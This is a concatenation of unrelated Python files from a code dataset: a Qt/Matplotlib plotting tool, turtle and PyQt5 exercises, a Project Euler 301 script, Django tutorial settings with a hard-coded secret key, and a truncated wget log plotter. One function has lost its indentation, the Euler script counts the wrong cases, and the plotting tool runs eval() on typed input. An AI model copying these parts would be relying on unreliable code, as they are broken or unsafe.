                _lines.extend(seg.T for seg in line.get_segments() if seg.size)
            else:
                _lines.append(line.get_data())
        for x, y in _lines:
            # tee + one next() gives consecutive point pairs (p0, p1).
            p0, p1 = tee(zip(x, y))
            try:
                next(p1)
            except StopIteration:
                continue
            for (x0, y0), (x1, y1) in zip(p0, p1):
                if x0 > x1:
                    (x0, y0), (x1, y1) = (x1, y1), (x0, y0)
                if not (lower <= x0 <= upper or lower <= x1 <= upper):
                    continue
                X = np.array(sorted({lower, x0, x1, upper}))
                if not X.size:
                    continue
                X = X[(X >= lower) & (X <= upper)]
                # Interpolate the segment at the clipped sample points.
                Y = np.interp(X, (x0, x1), (y0, y1))
                if np.isfinite(Y).any():
                    ylim = ymin, ymax = (min(ymin, np.nanmin(Y)),
                                         max(ymax, np.nanmax(Y)))
        return ylim
    def draw_warnings(self):
        """Render the collected warnings in red in the axes corner."""
        logger.debug('drawing warnings = %s', self.warnings)
        self.axes.text(0.05, 0.05, '\n'.join(self.warnings),
                       transform=self.axes.transAxes, color='red')
    def canvas_key_press(self, event):
        """Handle Matplotlib key events plus the extra ctrl shortcuts."""
        key_press_handler(event, self.canvas, self.mpl_toolbar)
        if event.key == 'ctrl+q':
            self._close()
        elif event.key in mpl.rcParams['keymap.home']:
            self.xlim = self.ylim = None
            self.draw()
        elif event.key == 'ctrl+x':
            self.set_xlim()
        elif event.key == 'ctrl+y':
            self.set_ylim()
        elif event.key == 'ctrl+l':
            self.draw(keeplims=True)
        self.xlogscale = self.axes.get_xscale()
        self.ylogscale = self.axes.get_yscale()
    def edit_parameters(self):
        """Open the toolbar's figure-options dialog; record any limit or
        scale changes the user made there."""
        xlim = self.axes.get_xlim()
        ylim = self.axes.get_ylim()
        self.mpl_toolbar.edit_parameters()
        if xlim != self.axes.get_xlim():
            self.xlim = self.axes.get_xlim()
        if ylim != self.axes.get_ylim():
            self.ylim = self.axes.get_ylim()
        self.xlogscale = self.axes.get_xscale()
        self.ylogscale = self.axes.get_yscale()
    def _margins(self):
        """Toggle 5% data margins on/off and redraw."""
        self.margins = 0 if self.margins else 0.05
        self.draw()
    def closeEvent(self, event):
        """Qt close hook: route through _close for reference cleanup."""
        self._close()
    def _close(self):
        """Drop the app's reference to this window and close it."""
        self.app.references.discard(self)
        self.window().close()
    def _input_lim(self, axis, default):
        """Prompt for axis limits; return an evaluated pair or None."""
        default = text_type(default)
        # Strip surrounding parens/brackets from the default display.
        if re.match(r'^\(.*\)$', default) or re.match(r'^\[.*\]$', default):
            default = default[1:-1]
        text, ok = QtWidgets.QInputDialog.getText(
            self, 'Set axis limits', '{} limits:'.format(axis),
            QtWidgets.QLineEdit.Normal, default)
        if ok:
            try:
                return eval(text_type(text), CONSTANTS.copy())
            except Exception:
                return None
        else:
            return None
    def set_xlim(self, draw=True):
        """Ask the user for new x-limits and optionally redraw."""
        self.xlim = self._input_lim(
            'x', self.xlim or self.axes.get_xlim())
        if draw:
            self.draw()
    def set_ylim(self, draw=True):
        """Ask the user for new y-limits and optionally redraw."""
        self.ylim = self._input_lim(
            'y', self.ylim or self.axes.get_ylim())
        if draw:
            self.draw()
    @staticmethod
    def data_dict(d):
        """Serialize one DataObj's current selection to an options dict,
        dropping unit (1.0) scales and empty props."""
        kwargs = OrderedDict((
            ('name', d.name),
            ('xname', text_type(d.xmenu.lineEdit().text())),
            ('xscale', text_type(d.xscale_box.text())),
            ('yname', text_type(d.menu.lineEdit().text())),
            ('yscale', text_type(d.scale_box.text())),
            ('props', d.props),
            ('labels', d.labels),
        ))
        for key in 'xscale', 'yscale':
            try:
                kwargs[key] = ast.literal_eval(kwargs[key])
            except ValueError:
                pass
            else:
                if float(kwargs[key]) == 1.0:
                    del kwargs[key]
        if not kwargs['props']:
            del kwargs['props']
        return kwargs
    def data_dicts(self):
        """Return a printable repr of every data set's options."""
        return "\n".join(text_type(dict_repr(self.data_dict(d)))
                         for d in self.datas)
    def event(self, event):
        """Intercept window-level ctrl shortcuts before normal dispatch."""
        control_actions = {
            QtCore.Qt.Key_M: self._margins,
            QtCore.Qt.Key_O: self.edit_parameters,
            QtCore.Qt.Key_Q: self._close,
        }
        if (event.type() == QtCore.QEvent.KeyPress and
                event.modifiers() == CONTROL_MODIFIER and
                event.key() in control_actions):
            control_actions[event.key()]()
            return True
        # Create duplicate of entire GUI with Ctrl+Shift+N
        elif (event.type() == QtCore.QEvent.KeyPress and
              event.modifiers() ==
              CONTROL_MODIFIER | QtCore.Qt.ShiftModifier and
              event.key() == QtCore.Qt.Key_N):
            create(*[d.copy() for d in self.datas])
            return True
        # Print dictionaries of keys and scales for all data with Ctrl+Shift+P
        elif (event.type() == QtCore.QEvent.KeyPress and
              event.modifiers() ==
              CONTROL_MODIFIER | QtCore.Qt.ShiftModifier and
              event.key() == QtCore.Qt.Key_P):
            print(self.data_dicts())
            sys.stdout.flush()
            return True
        return super(Interact, self).event(event)
def merge_dicts(*dicts):
"""Pad and concatenate arrays present in all input dictionaries."""
sets = [set(d) for d in dicts]
keys = sets[0].intersection(*sets)
def validate(array):
return (hasattr(array, 'dtype') and
(np.issubdtype(array.dtype, np.number) or
np.issubdtype(array.dtype, np.bool_)) and
np.squeeze(array).ndim == 1)
def pad(array):
return np.pad(np.squeeze(array), (0, length - array.size),
mode='constant', constant_values=(float('nan'),))
# Preserve non-dict types
merged = copy.copy(dicts[0])
try:
merged.clear()
except Exception:
merged = {}
for key in keys:
if all(validate(d[key]) for d in dicts):
length = max(len(d[key]) for d in dicts)
merged[key] = np.array([pad(d[key]) for d in dicts]).T
elif all(isinstance(d[key], collections.Mapping) for d in dicts):
merged[key] = merge_dicts(*[d[key] for d in dicts])
return merged
def dataobj(data, name='',
            xname=None, yname=None,
            xscale=None, yscale=None,
            labels=None, props=None, ndim=None,
            cdata=None, cmap=None, norm=None, **kwargs):
    """Bundle *data* plus plot options into the [data, name, options]
    list accepted by create().

    Named options and any extra keyword arguments are collected into the
    options dict; entries whose value is None are omitted.
    """
    # Collect the named options explicitly instead of mutating locals():
    # writes to locals() in function scope are undefined behavior and do
    # not propagate at all under PEP 667 (Python 3.13+); the old version
    # also leaked a spurious 'kwargs' entry into the options dict.
    options = dict(xname=xname, yname=yname, xscale=xscale, yscale=yscale,
                   labels=labels, props=props, ndim=ndim,
                   cdata=cdata, cmap=cmap, norm=norm)
    options.update(kwargs)
    return [data, name,
            {k: v for k, v in options.items() if v is not None}]
def create(*data, **kwargs):
    """
    Create an interactive plot window for the given data.
    >>> create(dataobj(dict1, 'Title1', 'XaxisKey1',
    ...        labels=['a', 'b'], xscale='1/degree'),
    ...        dataobj(dict2, 'Title2'))
    The inputs should define data dictionaries to plot as a list
    containing the dictionary itself, a name for the dictionary to use
    in titles and labels, and optionally a dictionary of extra settings
    described below. The only optional keyword argument is `title`
    which sets the window title.
    Dictionary options allowed per data definition:
    'labels': a list of labels for 2+ dimensional data
    'xname': a dictionary key (string) to plot on the x-axis
    'yname': a dictionary key (string) to plot on the y-axis
    'xscale': a string or number defining scale factor for x-axis
    'yscale': a string or number defining scale factor for y-axis
    """
    app_created = False
    app = QtCore.QCoreApplication.instance()
    if app is None:
        # No Qt event loop running yet: create (and later exec) our own.
        app = QtWidgets.QApplication(sys.argv)
        app_created = True
    app.references = getattr(app, 'references', set())
    # Backwards compatibility
    data = list(data)
    for i, d in enumerate(data):
        if isinstance(d, dict):
            # Bare dict: wrap with an empty name.
            data[i] = [d, '']
        elif hasattr(d, 'dtype') and isiterable(d.dtype.names):
            # Structured/record array: convert to a dict of its fields.
            data[i] = [{n: d[n] for n in d.dtype.names}, '']
        elif isiterable(d[-1]) and len(d) == 4:
            # Legacy (obj, name, xname, labels) form.
            d[-2] = {'xname': d[-2], 'labels': list(d[-1])}
            d.pop()
        elif isinstance(d[2], string_types) and len(d) >= 3:
            # Legacy form with xname as the third positional element.
            if len(d) == 3:
                d[-1] = {'xname': d[-1]}
            else:
                d[-1]['xname'] = d[-1].get('xname', d[2])
            # NOTE(review): this pop(2) also runs in the len(d) == 3
            # branch, discarding the options dict just built above --
            # verify against the legacy call forms.
            d.pop(2)
    interactive = mpl.is_interactive()
    try:
        # Build the window with interactive mode off to avoid extra draws.
        mpl.interactive(False)
        i = Interact(data, app, **kwargs)
    finally:
        mpl.interactive(interactive)
    app.references.add(i)
    i.show()
    i.raise_()
    if app_created:
        app.exec_()
    return i
def main():
    """Demo entry point: build sample sine data and open two windows."""
    num_series = 10
    t = np.tile(np.linspace(0, 10), (num_series, 1)).T
    colors = np.linspace(0, 1, num_series)
    sample = {'time': t, 'x': np.sin(t + colors)}
    first = dataobj(sample, name='data', xname='time', yname='x', yscale=3.0,
                    props={'linewidth': [1, 4]}, cdata=colors)
    create(first)
    # Second window: a shifted/scaled copy next to the original.
    copied, _, options = copy.deepcopy(first)
    copied['x'] = copied['x'] * 1.3 + 0.2
    del options['props']
    create(first, [copied, 'other', options])
# Script entry point: launch the demo windows.
if __name__ == '__main__':
    main()
| [
"jacob.niehus@gmail.com"
] | jacob.niehus@gmail.com |
2c2029eeb6e43b5d5a66ba54fa090d6a4da2db9d | 3f5e494339f09de4483237bd94932a1743970efc | /DocumentEbook/Python-Doc/PaythonProgramPractic/26ForLoopTurtle.py | 041e43ec49bd96a3e321f913d72513a450d735c1 | [] | no_license | saddamEDocument123/AllDocumentEbook | 4e63c3f689670c577d773caba621135b64e19d43 | 67dad3e0f21443013dd032c0d0d4aa331524cba1 | refs/heads/master | 2020-03-10T11:43:36.275201 | 2018-06-21T12:55:16 | 2018-06-21T12:55:16 | 129,362,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 567 | py | #using turtle and for loop we can make anything
# Draw several figures with the turtle module using for loops.
import turtle
t = turtle.Pen()
# Octagon: eight 50-step sides with 45-degree turns.
for i in range(0,8):
    t.forward(50)
    t.left(45)
t.reset() # reset the turtle and clear the canvas
# Star-like figure from near-180-degree turns.
for i in range(1,38):
    t.forward(100)
    t.left(175)
t.reset()
# Spirograph-style loops: 95-degree turns overshoot a square.
for i in range(1,25):
    t.forward(100)
    t.left(95)
t.right(90)
t.forward(100)
for i in range(1,20):
    t.forward(100)
    t.left(95)
t.reset()
t.left(180)
t.forward(100)
t.right(180)
for i in range(1,20):
    t.forward(100)
    t.left(95)
t.up()  # pen up: move without drawing
t.forward(100)
t.forward(40)
for i in range(1,20):
    t.forward(100)
t.left(95) | [
"sksddmhosan@gmail.com"
] | sksddmhosan@gmail.com |
e1164b25df69866a6cb1d50cfb9672d8d6217e7a | a9e81c87022fdde86d47a4ec1e74791da8aa0e30 | /python-learning/libraries/pyqt5/base/layouts/complex-layout.py | b774d4700b1104671fb8542f99d2d70b4238e84f | [
"Apache-2.0"
] | permissive | ymli1997/deeplearning-notes | c5c6926431b7efc1c6823d85e3eb470f3c986494 | f2317d80cd998305814f988e5000241797205b63 | refs/heads/master | 2020-07-29T11:15:43.689307 | 2018-05-05T10:58:18 | 2018-05-05T10:58:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,356 | py | # -*- coding: utf-8 -*-
'''
复杂布局
'''
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import sys
class Form(QMainWindow):
    """Demo window nesting a vertical, a grid and a horizontal layout."""
    def __init__(self,parent=None):
        super().__init__(parent)
        centerWidget = QWidget()
        defalutLayout = QVBoxLayout()
        vboxlayout = QVBoxLayout()
        hboxlayout = QHBoxLayout()
        gridlayout = QGridLayout()
        # Add the child widgets (five buttons per layout).
        buttons = []
        for i in range(5):
            buttons.append(QPushButton("Grid Button %d" %(i)))
            vboxlayout.addWidget(QPushButton("VBox Button %d" %(i)))
            hboxlayout.addWidget(QPushButton("HBox Button %d" %(i)))
        gridlayout.addWidget(buttons[0],0,0)
        gridlayout.addWidget(buttons[1],0,1)
        gridlayout.addWidget(buttons[2],1,0,1,2) # spans 1 row, 2 columns
        gridlayout.addWidget(buttons[3],2,0)
        gridlayout.addWidget(buttons[4],2,1)
        defalutLayout.addLayout(vboxlayout)
        defalutLayout.addLayout(gridlayout)
        defalutLayout.addLayout(hboxlayout)
        centerWidget.setLayout(defalutLayout)
        self.setCentralWidget(centerWidget)
        self.resize(640,480)
        self.setWindowTitle("PyQt5-")
# Script entry point: create the application and show the demo window.
if __name__ == '__main__':
    app = QApplication(sys.argv)
    ex = Form()
    ex.show()
sys.exit(app.exec_()) | [
"kkoolerter@gmail.com"
] | kkoolerter@gmail.com |
1b9da0c86e0e095737f906fdf95ded574b5a0f3c | 7ba5ec9aa9ddca3f9b3384fc4457b0a865c2a0a1 | /src/301.py | 55d8e16e1a35748acecac34a5c82e9d8d714e5c4 | [] | no_license | ecurtin2/Project-Euler | 71f79ee90a9abd0943421677d78a6c087419e500 | 79479da7a45b3ae67c0c7ea24da5f7d43c6f25d3 | refs/heads/master | 2021-03-19T14:52:57.045443 | 2018-04-12T22:05:37 | 2018-04-12T22:05:37 | 100,059,180 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | """
Nim is a game played with heaps of stones, where two players take it in turn to remove any number of stones from any heap until no stones remain.
We'll consider the three-heap normal-play version of Nim, which works as follows:
- At the start of the game there are three heaps of stones.
- On his turn the player removes any positive number of stones from any single heap.
- The first player unable to move (because no stones remain) loses.
If (n1,n2,n3) indicates a Nim position consisting of heaps of size n1, n2 and n3 then there is a simple function X(n1,n2,n3) — that you may look up or attempt to deduce for yourself — that returns:
zero if, with perfect strategy, the player about to move will eventually lose; or
non-zero if, with perfect strategy, the player about to move will eventually win.For example X(1,2,3) = 0 because, no matter what the current player does, his opponent can respond with a move that leaves two heaps of equal size, at which point every move by the current player can be mirrored by his opponent until no stones remain; so the current player loses. To illustrate:
- current player moves to (1,2,1)
- opponent moves to (1,0,1)
- current player moves to (0,0,1)
- opponent moves to (0,0,0), and so wins.
For how many positive integers n ≤ 2^30 does X(n,2n,3n) = 0 ?
"""
import numpy as np
import time
def X(n):
    """Return True iff the Nim position (n, 2n, 3n) is a first-player win.

    The nim-sum n XOR 2n XOR 3n is zero exactly for losing positions.
    """
    m = int(n)
    nim_sum = m ^ (m << 1) ^ (m + (m << 1))
    return nim_sum != 0
N = 2**28
t = time.time()
n = np.arange(1, N)
# Vectorized nim-sum n ^ 2n ^ 3n; True where the result is non-zero.
x = np.bitwise_xor(n, np.bitwise_xor(2*n, 3*n)).astype(bool)
# NOTE(review): np.sum(x) counts n with X(n,2n,3n) != 0, but the puzzle
# asks for X == 0 (and for n up to 2**30, inclusive) -- verify intent.
total = np.sum(x)
print("Numpy done in {:10.8f} seconds.".format(time.time() - t))
print(total)
# Pure-Python reference implementation (much slower):
#t = time.time()
#total = sum(X(i) for i in range(1, N))
#print("Python done in {:10.8f} seconds.".format(time.time() - t))
#print(total) | [
"ecurtin2@illinois.edu"
] | ecurtin2@illinois.edu |
482552e3943e7fa329ff070ecce56cb7ea092896 | eae0bc786163a7746147240f8e1dec2f84f1713e | /zibal/gateway/mongoModel.py | 5b10387459ec22fce133faf582d44b0e20f49a5d | [] | no_license | Fahmadi/zibal | 06da4f28495532ff44ca3a9a8d44d31c6984afca | 3d482e122750f01f77f201273fcc7cc3f8558a4d | refs/heads/master | 2020-03-26T05:45:03.929188 | 2018-10-06T13:55:31 | 2018-10-06T13:55:31 | 144,572,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | from django.db.models import UUIDField
from mongoengine import StringField, Document, ReferenceField, IntField, BooleanField
class GatewayMerchant(Document):
    """Payment-gateway record owned by a user (mongoengine document)."""
    title = StringField(max_length=120, required=True)
    website = StringField(max_length=50)
    merchant_key = StringField(max_length=50)
    user_id = IntField(max_length=50)
    user_activate = BooleanField(default=True)  # owner account enabled flag
    meta = {'allow_inheritance': True}
class Transaction(Document):
    """A payment transaction routed through a merchant's gateway."""
    amount = IntField(max_length=50)  # NOTE(review): currency unit unspecified -- confirm
    callback_url=StringField(max_length=70)
    gateway_id = ReferenceField(GatewayMerchant)
    merchant_key = StringField(max_length=70)
    payir_transaction_id = StringField(max_length=50)  # id from the pay.ir side
    status = BooleanField(default=False)  # presumably True once paid -- verify
    card_number = IntField(max_length=16, null=True)
    transId = IntField(max_length=16 , null=True)
    zibalId = IntField(max_length=12)
mobile = IntField(max_length= 12) | [
"f.ahmadi.012@gmail.com"
] | f.ahmadi.012@gmail.com |
6581839ee0756f4cfadb872de1355049dea9b1b3 | 2b4513065b8a47628880eb266a3b2816d5fa236d | /mysite/settings.py | 0b16301e1e9fa2f31051399c83f0167574776a9d | [] | no_license | Mirnal1409/my-first-blog | 0efe0c1cdbbb36b34a245a097c8d3338c7730d29 | d28b40a51133dc3651e2bb6cfbf9405022f8efde | refs/heads/master | 2021-01-25T11:27:21.302289 | 2018-03-01T07:09:56 | 2018-03-01T07:09:56 | 123,397,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,197 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^7k2&r97=5z)(anoo0f4_z8)e!pt5mncw1d(07-eri5z+5jxap'
# NOTE(review): a real secret key is committed here and DEBUG is on --
# move the key out of version control before deploying.
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"mirnal1409@gmail.com"
] | mirnal1409@gmail.com |
7f77a003252c80a23d1ad91c4ca9b0e7c220e44a | dea919cb602c36111acafe27d9d264685d7cc793 | /10.py | c1aee6b453192e044a22769c04853b3952148d15 | [] | no_license | nikitos219745/Kolokviym | f1a781d0177f64986fddbe7f40447234a8beb41f | 1a8d312a129416b8462cd5c05c27ce975c4009fb | refs/heads/master | 2022-04-27T17:53:27.270463 | 2020-04-23T20:16:00 | 2020-04-23T20:16:00 | 258,319,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,129 | py | #Чекалін Нікіта Валерійович 1 курс Завдання 10
#Дані про температуру повітря за декаду листопада зберігаються в масиві.
#Визначити, скільки разів температура опускалася нижче -10 градусів.
import numpy as np
while True:
a = np.zeros(10, dtype=int)
count = 0#лічильник
for i in range(len(a)):
a[i] = int(input("Введіть температуру: "))#введення данних
for i in range(len(a)):#умова для визнач к-ль опусканння темп
if a[i] <= -10:
count += 1#лічильник
print("Масив ",a)
print("Кількість раз, коли температура була ниже -10: ",count)
print("Щоб запустити програму спочатку натисніть 1. Для виходу будь яке інше значення")
choise = input()
if choise == "1":
continue
else:
break
| [
"noreply@github.com"
] | nikitos219745.noreply@github.com |
fd8de2697b4189f330512629ee7301296a8a337b | 4dfa10de8e96fa8f11129d8865e8b0dda0878d20 | /haptic_bridge/build/devel/lib/python2.7/dist-packages/haptic_bridge/srv/__init__.py | ab0307cc7c1767177bffd7e83f168614ee03f7e9 | [] | no_license | tjh-flash/WokeRepository | 8d137f252cde4d849ad7095b9eee4c9d16a3fb41 | d1bc8498d27887e597f9539901b8fd8ecee5e165 | refs/heads/master | 2023-03-27T07:39:53.815869 | 2021-03-31T07:42:02 | 2021-03-31T07:42:02 | 353,265,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | from ._CloseDevice import *
from ._OpenDevice import *
from ._StartControl import *
from ._SwitchAxis import *
| [
"fshs@163.com"
] | fshs@163.com |
d9768ff6fbed6edd8e2242aa40f624d70eba0c44 | eae0bbb85494d04d87d69cb2cbde9c0b7b7c0ed1 | /ishare/userprofile/admin.py | b88e8a56c13b87c4fb6f828a5815cbe84ef83692 | [] | no_license | owenmead/ishare | 1457a9b2b998888bad44294ab3be5c285ff28a68 | 17e857da490d0a556bdf0337d2fc7fed46a35a4f | refs/heads/master | 2016-09-06T21:35:28.205692 | 2011-02-06T18:05:44 | 2011-02-06T18:05:44 | 1,286,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from django.contrib import admin
from ishare.userprofile.models import UserProfile
admin.site.register(UserProfile) | [
"owenmead@gmail.com"
] | owenmead@gmail.com |
a24baa4d6bc822d4b1281390833220aec3d84176 | 2aa47f47fb81798afdf41437844cbbea8e9de66c | /02pythonBase/day10/res/exercise/mysum.py | f01610139cf297dab58d87dd27cd73d8d71c2bb2 | [] | no_license | nykh2010/python_note | 83f2eb8979f2fb25b4845faa313dbd6b90b36f40 | 5e7877c9f7bf29969072f05b98277ef3ba090969 | refs/heads/master | 2020-04-27T23:10:16.578094 | 2019-03-23T02:43:14 | 2019-03-23T02:43:14 | 174,765,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | # 练习:
# Write a function mysum that accepts any number of numeric arguments
# and returns the sum of all of them:
# def mysum(*args):
#     ... # <<<--- implement here
# print(mysum(1, 2, 3, 4)) # 10
# print(mysum(1, 2, 3, 4, 5)) # 15
def mysum(*args):
    """Return the sum of any number of numeric arguments."""
    print("第11行的mysum被调用!")
    return sum(args)
def mysum(*args):
    """Redefinition of mysum above; same result via explicit accumulation."""
    print("第17行的mysum被调用!")
    total = 0
    for number in args:
        total += number
    return total
# Only the second mysum definition is live here (it shadows the first).
print(mysum(1, 2, 3, 4)) # 10
print(mysum(1, 2, 3, 4, 5)) # 15
| [
"xulingfeng@boe.com.cn"
] | xulingfeng@boe.com.cn |
6b3412794702ca46f4ce306d7d9ecffcb3d07cf5 | 3af673d901f44dbabe6b223593270ac1334ef4b3 | /자료구조/day01/ClassTask.py | b02a40a4c624de3d893c21cda8b106d18813c4a1 | [] | no_license | ghldbssla/Python | 612f0a033f92952d68a805219c44b9a1e2df1a92 | 4aeae0f95625512648cd16971fd8e0c19bb219b4 | refs/heads/master | 2023-03-10T16:59:48.989666 | 2021-02-21T09:10:19 | 2021-02-21T09:10:19 | 328,637,426 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 743 | py | #ClassTask.py
class User:
    """Simple member record with an auto-incrementing member number."""
    # Class-level defaults; usernum doubles as the shared member counter.
    userid=''
    userpw=''
    username=''
    usernum=1
    def __init__(self, userid, userpw,username):
        # User.usernum is a class variable: each new user takes the
        # current value, then the counter is incremented.
        self.usernum=User.usernum
        User.usernum+=1
        self.userid=userid
        self.userpw=userpw
        self.username=username
    # The string returned here is what printing the object shows.
    def __repr__(self):
        return str(self.usernum)+"번 회원 : "+self.userid+"("+self.username+")"
user1 = User('apple','1234','김사과')
user2 = User('banana','1234','반하나')
# __repr__ normally yields an address-based string; overriding
# (redefining) it changes what gets printed. Overriding!
print(user1)
print(user2)
| [
"ghldbssla1997@gmil.com"
] | ghldbssla1997@gmil.com |
d935440f0a1a0145827789b26ea165b74904196d | 79fb9dc443b9457bd5fc79940dbc042596b32a9e | /ex31.py | 4cc36fc7092dd45123a3fb876e014cc735fc5d94 | [] | no_license | davray/lpthw-exercises | c73e9d9d8211e2694a057dd69773fab9cfceb447 | 3fdc32672039ef7a65d36a3196aa4d2c48249e3c | refs/heads/master | 2021-01-12T13:07:02.323703 | 2016-11-09T07:12:30 | 2016-11-09T07:12:30 | 70,118,579 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,052 | py | print '''
You enter a dark room with two doors.
Do you go through door #1 or door #2?'''
# NOTE: Python 2 script (print statements and raw_input); will not run on Python 3.
door = raw_input("> ")
if door == "1":
    # Door 1: the bear encounter.
    print "There's a giant bear here eating cheese cake. What do you do?"
    print "1. Take the cake."
    print "2. Scream at the bear."
    bear = raw_input("> ")
    if bear == "1":
        print "The bear eats your face off. Good job."
    elif bear == "2":
        print "The bear eats your legs off. Good job."
    else:
        # Any other answer is treated as the "safe" choice.
        print "Well, doing %s is probably better. Bear runs away." % bear
elif door == "2":
    # Door 2: the Cthulhu encounter.
    print "You star into the endless abyss at Cthulu's retina."
    print "1. Blueberries."
    print "2. Yellow jacket clothespins."
    print "3. Understand revolvers yelling melodies."
    insanity = raw_input("> ")
    if insanity == "1" or insanity == "2":
        print "Your body survives powered by a mind of jello. Good job."
    else:
        print "The insanity rots your eyes into a pool of much. Good job."
else:
    # Anything other than "1" or "2".
    print "You stumble around and fall on a knife and die. Good job."
| [
"davduaray@gmail.com"
] | davduaray@gmail.com |
3d4faadfd14bafd5da0fe8ad3de8abae6921eadf | 4202f125131f96e67c9efce0759266838aace064 | /Week 6 - Plots/wget-visualizer/run-001-20190410/wget-visual.py | 8494de4e80b80cca35811fc9d67ef36678da2111 | [] | no_license | emregunaydinn/METU-BA4318-Fall2019 | de163ac1e853a19136f3c9ab23fd06581c75b150 | f2434d83eb5e9ad7684f7e83fc39bc7d324f68ab | refs/heads/master | 2022-03-28T06:54:56.766262 | 2020-01-19T15:24:11 | 2020-01-19T15:24:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,149 | py | import warnings
import pandas as pd
import numpy as np
from numpy import convolve
import matplotlib.pyplot as plt
from matplotlib import figure
def convert_number_to_KMG(x):
    """Format a number with a K/M/G suffix, rounded to roughly two digits.

    Values below 1000 are rounded to the nearest ten and returned plain;
    larger values are scaled down and suffixed with K, M, or G.
    """
    if x < 1000:
        return str(round(x, -1))
    if x < 1000000:
        return str(round(x, -2) / 1000) + "K"
    if x < 1000000000:
        return str(round(x, -5) / 1000000) + "M"
    return str(round(x, -8) / 1000000000) + "G"
def convert_KMG_to_number(x):
    """Parse a string with an optional K/M/G suffix into an int.

    "1.5K" -> 1500, "2M" -> 2000000, "3G" -> 3000000000, "500" -> 500.
    A bare suffix with no digits ("K", "M", "G") yields 0.
    """
    total_stars = 0
    if "K" in x:
        if len(x) > 1:
            total_stars = float(x.replace('K', '')) * 1000  # convert K to a thousand
    elif "M" in x:
        if len(x) > 1:
            total_stars = float(x.replace('M', '')) * 1000000  # convert M to a million
    elif "G" in x:
        # Bug fix: guard added for consistency with the K/M branches — the
        # original called float('') on a bare "G" and raised ValueError.
        if len(x) > 1:
            total_stars = float(x.replace('G', '')) * 1000000000  # convert G to a billion
    else:
        total_stars = float(x)  # Less than 1000, no suffix
    return int(total_stars)
def convert_speed(arr):
    """Convert K/M/G-suffixed speed strings (with ',' decimals) to a numpy array."""
    parsed = [convert_KMG_to_number(item.replace(",", ".")) for item in arr]
    return np.array(parsed)
def load_files(filenames, cols):
    """Load each wget log into a one-column DataFrame keyed by the file stem.

    Skips the 5-line header and 2-line footer of each whitespace-delimited
    log, keeps only the requested columns, drops rows with missing values,
    and renames the column to the file's stem.
    """
    frames = {}
    for filename in filenames:
        key = filename.split(".")[0]
        df = pd.read_csv(filename, skiprows=5, skipfooter=2, header=None,
                         delim_whitespace=True, error_bad_lines=False,
                         usecols=cols)
        df = df.dropna(how='any')
        df.columns = [key]
        frames[key] = df
    return frames
def clean_extreme(values, target=5):
    """Damp extreme spikes in-place until max/mean <= target; return `values`.

    Each pass replaces the current maximum with the average of itself and
    the mean, pulling outliers toward the bulk of the data.
    """
    ratio = 10 * target  # force at least one check
    while ratio > target:
        mean = np.mean(values)
        ratio = np.amax(values) / mean
        if ratio <= target:
            break
        peak_idx = np.argmax(values)
        values[peak_idx] = (values[peak_idx] + mean) / 2
    return values
def fabric_softener(values, window=50):
    """Moving-average smoothing followed by spike damping via clean_extreme."""
    finite = values[~np.isnan(values)]  # discard NaN samples first
    weights = np.repeat(1.0, window) / window
